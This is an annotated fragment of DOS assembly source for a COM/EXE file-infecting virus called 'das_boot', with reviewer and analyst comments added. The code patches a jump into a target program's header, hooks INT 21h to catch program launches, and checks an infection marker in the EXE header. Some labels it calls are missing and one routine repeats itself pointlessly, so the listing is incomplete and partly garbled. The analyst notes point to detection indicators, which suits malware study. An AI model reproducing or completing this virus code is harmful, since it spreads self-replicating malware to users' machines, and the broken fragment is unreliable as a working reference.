; file: das_boot.a86
; description: _small virus modified into multipartite com/exe infector
; thanks to: dark angel of phalcon/skism
;=============================================================================
; das_boot: program entry label; it is also the symbol named by the closing
; `end` directive.
; NOTE(review): `relative` is not defined anywhere in this excerpt, so what the
; call reaches, and whether control ever returns here, cannot be told from
; this listing.
das_boot:
call relative ;transfer to a label that lies outside this excerpt
; infect_mbr: saves DS and ES on the stack, then loads DS, ES and AX with the
; current CS value via push/pop pairs.
; NOTE(review): despite the label name, no disk or boot-sector access appears
; in this excerpt, and the pops that would restore the saved DS/ES are not
; shown. The second DS/ES load repeats the first with nothing changed in
; between. Control falls through into infectcom as the listing stands.
infect_mbr:
push ds ;save caller's ds
push es ;save caller's es
push cs
pop ds ;ds = cs
push cs
pop es ;es = cs
push cs
pop ax ;ax = cs
push cs
pop ds ;ds = cs again (repeats the load above)
push cs
pop es ;es = cs again (repeats the load above)
; infectcom: writes a 3-byte near jump (opcode E9h + 16-bit displacement) at
; DS:[DI], which the original comments call the start of the target header.
; In:   ax = value the original comment calls the file pointer offset
;       di = offset of the buffer being patched
;       (the code that sets both is not part of this excerpt)
; A86 reads a numeric literal with a leading 0 as hexadecimal: 0e9 = E9h.
; The 3 subtracted from ax equals the length of the E9 jump itself; a near
; jump's displacement is counted from the end of the instruction.
; Analyst note: this rewrites the first three bytes of the buffered program
; start, so a baseline of those bytes (integrity checking) exposes the change.
infectcom:
sub ax,03 ;displacement = offset - 3 (size of the jmp being written)
mov byte ptr ds:[di],0e9 ;byte 0 of buffer = E9h, near jmp opcode
mov ds:[di+01],ax ;bytes 1-2 of buffer = jmp displacement
; int21: head of the replacement INT 21h handler. Only AX = 4B00h (DOS EXEC,
; load and execute program) is diverted; every other request goes straight to
; the original handler through `chain`.
; NOTE(review): `infect` is not defined in this excerpt. The code that installs
; this handler in the interrupt vector table is not shown either.
; Analyst note: a resident INT 21h handler that filters on 4B00h sees every
; program launch; an unexpected change of the INT 21h vector is the matching
; thing to monitor.
int21:
cmp ax,04b00 ;is this a load-and-execute request (ax = 4B00h)?
je infect ;yes: branch to the infection path (label not in excerpt)
jmp short chain ;no: hand the call to the original int21 handler
; infectexe: already-infected test for an EXE target.
; Compares the word at [di+10h] with exe_id and branches away when they match.
; Offset 10h of an MZ EXE header is the initial-SP field, which agrees with the
; original comment; this assumes di points at a buffered copy of that header.
; TODO confirm against the elided read code.
; NOTE(review): exe_id and go_already_infected are defined outside this excerpt.
; Analyst note: a fixed marker in the header's initial-SP field is a static
; indicator that can be used to identify files this code has already modified.
infectexe:
cmp word ptr [di+010],exe_id ;does the header sp field hold the marker value?
je go_already_infected ;marker present: skip this file
; chain: pass-through to the original INT 21h handler.
; The single opcode byte EAh (jmp far ptr16:16) is followed directly by old21,
; so the two words stored in old21 serve as the jump's offset:segment operand.
; The byte layout matters: nothing may sit between `db 0ea` and `old21`.
; NOTE(review): old21 is declared uninitialised (`?`). The code that stores the
; original vector into it is not in this excerpt.
chain:
db 0ea ;opcode EAh = jmp far; its operand is the 4 bytes that follow
heap:
old21 dw ?, ? ;offset, then segment, of the original int21 handler
end das_boot